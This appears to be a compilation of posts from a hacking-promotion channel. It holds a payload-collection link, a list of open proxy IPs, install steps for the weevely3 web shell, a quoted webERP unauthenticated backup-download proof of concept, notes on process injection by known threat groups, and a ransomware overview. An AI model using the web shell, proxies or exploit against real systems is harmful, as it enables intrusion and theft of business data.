▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑A list of useful payloads and bypass for Web Application Security and Pentest/CTF
fb.com/UndercodeTesting

🦑FEATURES :

Methodology and Resources
Active Directory Attack.md
Cloud - AWS Pentest.md
Cloud - Azure Pentest.md
Cobalt Strike - Cheatsheet.md
Linux - Persistence.md
Linux - Privilege Escalation.md
Metasploit - Cheatsheet.md
Methodology and enumeration.md
Network Pivoting Techniques.md
Network Discovery.md
Reverse Shell Cheatsheet.md
Subdomains Enumeration.md
Windows - Download and Execute.md
Windows - Mimikatz.md
Windows - Persistence.md
Windows - Post Exploitation Koadic.md
Windows - Privilege Escalation.md
Windows - Using credentials.md
CVE Exploits

🦑 DOWNLOAD :
https://github.com/swisskyrepo/PayloadsAllTheThings


▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑FRESH PREMIUM PROXIES :
instagram.com/undercodetesting

103.209.65.12 6666 1 hour ago
3752 ms 8% (68) in India - Valsad Elite -
113.254.104.207 80 1 hour ago
851 ms 2% (73) hk Hong Kong - Central Elite -
115.223.2.114 80 1 hour ago
1268 ms 50% (48) cn China - Wuhan Elite -
186.229.25.18 8080 1 hour ago
3966 ms 30% (75) br Brazil - Rio de Janeiro Elite -
190.210.8.93 8080 1 hour ago
3592 ms 7% (66) ar Argentina - Buenos Aires Elite -
191.241.34.222 8089 1 hour ago
3945 ms 25% (33) br Brazil - Caucaia Elite -
203.218.82.122 8080 1 hour ago
766 ms 44% (50) hk Hong Kong - Central Elite -
223.68.190.130 8181 1 hour ago
2639 ms 39% (60) cn China - Yangzhou Elite -
43.224.8.14 6666 1 hour ago
3591 ms 8% (75) in India - Vadodara Elite -
47.89.193.30 8118 1 hour ago
147 ms 2% (70) us United States - San Mateo Elite -
149.28.180.233 8081 1 hour ago
1607 ms 79% (19) us United States Elite -
167.99.166.194 8081 1 hour ago
1356 ms 6% (91) us United States - Santa Clara Elite -


170.254.150.166 80 1 hour ago
2523 ms 59% (46) br Brazil Elite -
167.71.198.204 8080 1 hour ago
1810 ms 84% (50) us United States Elite -
181.118.167.104 80 1 hour ago
721 ms 98% (43) cl Chile - Santiago Elite -
182.23.81.82 3128 1 hour ago
3245 ms 19% (72) id Indonesia - Jakarta Elite -
185.10.166.130 8080 1 hour ago
4166 ms 20% (66) gb United Kingdom - London Elite -
103.141.180.130 8080 1 hour ago
3554 ms 16% (66) id Indonesia Elite -
103.216.82.199 6666 1 hour ago
3984 ms 9% (83) in India - Ahmedabad Elite -
118.25.35.202 9999 1 hour ago
2175 ms 34% (60) cn China Elite -
122.233.234.32 8118 1 hour ago
2756 ms 36% (50) cn China Elite -
123.252.173.162 80 1 hour ago
4373 ms 20% (68) in India Elite -
134.249.141.148 80 1 hour ago
3517 ms 21% (74) ua Ukraine - Lviv Elite -
140.227.238.18 1000 1 hour ago
2500 ms 20% (66) jp Japan Elite -
35.222.208.56 3128 1 hour ago
762 ms 80% (50) us United States Elite -
36.55.230.146 8888 1 hour ago
2511 ms 20% (80) jp Japan - Kanazawa Elite -
31.131.67.14 8080 1 hour ago
3489 ms 15% (68) ru Russia - Moscow Elite -
52.161.188.148 80 1 hour ago
332 ms 100% (16) us United States Elite -
52.163.87.222 8080 1 hour ago
1253 ms 88% (16) sg Singapore Elite -
78.46.40.154 8118 1 hour ago
1190 ms 16% (75) de Germany - Nuremberg Elite -
79.137.123.252 3131 1 hour ago
774 ms 8% (76) fr France Elite -
79.137.44.85 3129 1 hour ago
2379 ms 65% (67) es Spain - Madrid Elite -
82.119.170.106 8080 1 hour ago
882 ms 85% (53) de Germany - Berlin Elite -
85.90.215.111 3128 1 hour ago
3012 ms 27% (65) ua Ukraine - Kharkiv Elite -
84.42.247.101 3128 1 hour ago
3790 ms 25% (68) cz Czech Republic - Prague Elite -

@uNDERCODEtESTING
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑updated Weaponized web shell
pinterest.com/Undercode_Testing

🦑FEATURES :

Shell access to the target
SQL console pivoting on the target
HTTP/HTTPS proxy to browse through the target
Upload and download files
Spawn reverse and direct TCP shells
Audit remote target security
Port scan pivoting on target
Mount the remote filesystem
Bruteforce SQL accounts pivoting on the target

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ :

1) git clone https://github.com/epinna/weevely3.git

2) cd weevely3

3) Make sure that the python package manager and yaml libraries are installed

4) $ sudo apt-get install -y python3 python3-pip curl

5) $ cd weevely3/

6) $ sudo pip3 install -r requirements.txt --upgrade

🦑 OS X

OS X
OS X requires Python3 to be installed in the system. Follow the following commands to install manually gnureadline Python package.

$ sudo pip3 install gnureadline
$ cd weevely3/
$ sudo pip3 install -r requirements.txt --upgrade

@uNDERCODEtESTING
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 EXPLOIT VERIFIED BY UNDERCODERS :

# Exploit Title: webERP 4.15.1 - Unauthenticated Backup File Access
# Date: 2020-05-01
# Author: Besim ALTINOK
# Software Link: https://sourceforge.net/projects/web-erp/
# Version: v4.15.1
# Tested on: Xampp
# Credit: İsmail BOZKURT

--------------------------------------------------------------------------
About Software:

webERP is a complete web-based accounting and business management system
that requires only a web-browser and pdf reader to use. It has a wide range
of features suitable for many businesses particularly distributed
businesses in wholesale, distribution, and manufacturing.

-------------------------------------------------------
PoC Unauthenticated Backup File Access
---------------------------------------------

1- This file generates new Backup File:
http://localhost/webERP/BackUpDatabase.php
2- Someone can download the backup file from:
--
http://localhost/webERP/companies/weberp/Backup_2020-05-01-16-55-35.sql.gz


@UndercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Real-world examples of process injections in action
DoublePulsar tut :
t.me/UndercodeTesting

🦑𝕃𝔼𝕋'𝕊 𝕊𝕋𝔸ℝ𝕋 :


> An analysis of the kernel mode payload of the famous DoublePulsar code by F-Secure revealed that it utilizes a form of DLL injection to load a DLL into a target process (in this case, lsass.exe) using an Asynchronous Procedure Call (APC). It did not utilize the standard Windows API commands such as LoadLibrary and did not write the DLL to disk, making it stealthier.

1) Cobalt Strike
Cobalt Strike is a penetration testing software that was designed to execute targeted attacks and emulate post-exploitations actions of advanced threat actors through a listener called a beacon.

2) Cobalt Strike commands such as keylogger, screenshot and so on were designed to be injected into another process for it to work. The listener is injected into a specific process (a personal favorite is explorer.exe because the process is always running in a GUI environment) and the keystroke logger will monitor all keystrokes via the infected process. It then reports them to the beacon console without writing to disk. This only stops when the process terminates or the keystroke logger job is terminated by the user.

3) Lazarus Group
The Lazarus Group (also known as “Hidden Cobra”) is a threat group headquartered in North Korea whose malicious activities span across multiple years, as far back as 2009. Since 2016, the group has been conducting “FASTCash” attacks — stealing money from ATMs from target banks in Africa and Asia. The target bank’s network is compromised and a malware known as Trojan.Fashcash is deployed on the network.

> An analysis of the malware reveals that malicious Advanced Interactive eXecutive (“AIX”) executable files are injected into legitimate processes on the payment application servers used in handling ATM transactions. The executable allows the group to monitor, intercept and generate responses to fraudulent transaction requests using fake ISO 8583 (standard used for financial transaction messaging) messages. This allows attempts to withdraw cash via an ATM to be successful.

5) APT41
APT41 is a threat group headquartered in China and known for carrying out Chinese state-sponsored espionage campaigns dating as far back as 2012.

> The group is known for its software supply chain attacks, where TTPs developed from accessing video game production environments are utilized. These TTPs are used to compromise software companies and malicious codes are injected into software updates distributed to victim organizations.

4) WINTERLOVE is a backdoor used by the group to load and execute remote code in a running process (e.g., iexplorer.exe) and can be used to enumerate system files and directories.

5) Mitigation/prevention
DLL injection is not necessarily a bad technique as many applications use it for legitimate purposes such as your Antivirus/Endpoint Detection and Response (“EDR”)7 solutions which inject their own codes/agents into running processes in order to monitor the process and detect abnormal activities. Therefore, making it hard to detect especially since it runs under a legitimate process.

6) Behavior analysis
This method can be achieved by configuring your EDRs to detect cross-process events such as injection of code into a running process, duplicate processes running, remote threads and so on.

7) EDRs work by gathering, monitoring and analyzing endpoint activities/events. This gives the security team the necessary visibility to carry out further analysis, detection, investigation and mitigation into advanced cyber threats across all endpoints running an EDR.

As part of their response capabilities, EDRs can be configured to block certain types of process injection, depending on the behavior that occurs during the injection process.

@UndercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 PAID PDF COLLECTIONS

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑MOST ACTIVE RANSOMWARE 2019-2020 :
T.me/UndercodeTesting


1) STOP (DJVU)
The STOP ransomware strain, also known as DJVU, has been submitted to the ID Ransomware tool over 75,000 times, which only represent a sliver of the systems it may have affected worldwide.

STOP affects the systems of home users and can be easily picked up by downloading unsecure files from torrent sites. Once the infection begins the STOP malware will use the AES-256 encryption to lock the system files, followed by a payment demand issued to the user. It is by far the most common submission to ID Ransomware as it accounts for 56 percent of all submissions.

2 ) Dharma
The Dharma variant not only will lock a system, but it will instruct the victim to contact a specific email where they are expected to negotiate the release of their files. Dharma is a cryptovirus which is pushed onto system via malicious download links and email hyperlinks.

Operating in the threat landscape since 2016, Dharma is part of the .cezar family. It mainly targets enterprise targets. Dharma accounted for 12 percent of submissions.

3 )Phobos
Ransomware 2019
Credit: Luca Ruegg via Unsplash
Phobos, either named after the Martian moon or its namesake the Greek god of fear, is a ransomware variant that makes up 8.9 percent of all submissions.

It is mainly spread via exploits of insufficiently secured Remote Desktop Protocol ports. Phobos has been seen in the wild attacking corporations and public bodies indiscriminately. In a similar manner to Dharma this ransomware locks your files and then request you contact the attacker directly to negotiate their release.

4) GlobeImposter
GlobeImposter makes up 6.5 percent of all submissions to the ID Ransomware tool. GlobeImposter is the next evolution on pervious strains of the variant. What makes it different is it uses AES-256 cryptography to encrypt a victim’s files before it issues a bitcoin payment demand.

5 )REvil
REvil also known as Sodinokibi was first discovered in 2019 and security research believe that it was developed by the same threat actors who created GandCrab.

Emsisoft notes that Sodinokibi is seen as a “Ransomware-as-a-service that relies on affiliates to distribute and market the ransomware. It is extremely evasive and uses advanced techniques to avoid being detected by security software.”

The attack vectors for this variant include exploiting a vulnerability in Oracle WebLogic and more traditional methods such as phishing campaigns. It makes up 4.5 percent of submissions.

The ransomware 2019 threat landscape is woefully vibrant as hackers continues to see value in targeting enterprises, public bodies and governments.
Countries most affected by ransomware Credit: Emsisoft

6) GandCrab
According to Europol the GandCrab ransomware variant has infected nearly half a million victim systems since it was first detected at the start of 2018. It accounts for 3.6 percent of submissions.

The GandCrab virus infects and encrypts all the files within a user’s systems. Originally the ransomware was distributed via exploit kits such as RIG EK and GrandSoft EK. Cybersecurity company Bitdefender has created a useful decrypting tool to help mitigate GandCarb lock-outs.

7) Magniber
Magniber has been around in one form or another since 2013, but it still accounts for 3.3 percent of submissions.

Cybersecurity firm Malwarebytes have been tracking this variant for some time and noticed that it is continually evolving. In one of the latest version they state that: “Each file is encrypted with a unique key—the same plaintext gives a different ciphertext. The encrypted content has no patterns visible. That suggests that a stream cipher or a cipher with chained blocks was used (probably AES in CBC mode).”

8 )Scarab
Ransomware 2019
Credit: Timothy Dykes via Unsplash
The Scarab ransomware was first discovered in June 2017. The malicious software uses the encryption algorithms AES-256 and RSA-2048 to lock the files on a targeted system. It makes up 2.0 percent of submissions.

Cyber security firm Symantec notes that: “Many of Scarab’s campaigns focus on distributing the group’s custom malware (Trojan.Scieron and Trojan.Scieron.B) through emails with malicious attachments. These files contain exploits that take advantage of older vulnerabilities that are already patched by vendors. If the attackers successfully compromise the victims’ computers, then they use a basic back door threat called Trojan.Scieron to drop Trojan.Scieron.B onto the computer.”

9 )Rapid
Rapid accounts for 1.8 percent of submissions. It is a ransomware that acts as a trojan horse to encrypted files and then demand a ransom.

Rapid busted onto the scene in 2018. When it infects a systems it will remove all of the Windows shadow volume copies stop all database processes and take automatic repair offline. Once files are encrypted like the others it will issues a ransom demand.

10) Troldesh
Troldesh also known as Shade accounts for 1.4 percent of submissions. Troldesh is a Trojan horse that locks files in a system via an encryption method. The malware has been around since 2014, but is still used in many active ransomware campaigns.

@UndercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁